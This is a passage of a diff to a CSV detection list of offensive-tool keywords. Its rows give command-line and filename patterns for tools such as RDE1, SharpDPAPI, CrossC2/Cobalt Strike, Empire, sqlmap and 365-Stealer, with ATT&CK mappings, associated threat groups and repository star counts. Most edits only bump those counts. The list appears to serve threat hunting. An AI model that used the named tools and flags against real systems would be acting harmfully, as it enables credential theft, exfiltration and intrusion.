T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" -"* crde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* crde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* Cred_Dump.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"* credentials /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* credentials /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* creds-summary.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* CrossC2 Listener*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "* CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "* CrossC2Kit *","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","0","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "* CSExec.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* -CShardDLLBytes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -CShardDLLBytes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* cups-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cups-queue-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --custom_user_agent*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" @@ -392,7 +392,7 @@ "* --custom-steal onedrive*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal onenote*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal outlook*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" -"* --cve=* --command*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --cve=* --command*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* CVE-2023-38831-RaRCE*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "* cvs-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cvs-brute-repository.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -405,37 +405,37 @@ "* -d * -u * -p * --listener * --target *$DC_HOST*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* -d * -u *\* -p * --da*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* -d *Active Protection DLL for SylantStrike*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" -"* -d:sleepmask*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* -d:sleepmask*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "* daap-get-library.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -daisyserver *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* darkcodersc *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"* -daisyserver *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* darkcodersc *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" "* darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "* daytime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* db2-das-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --dbms=mysql -u *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --dc * -m custom --filter *objectCategory*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --dbms=mysql -u *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --dc * -m custom --filter *objectCategory*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 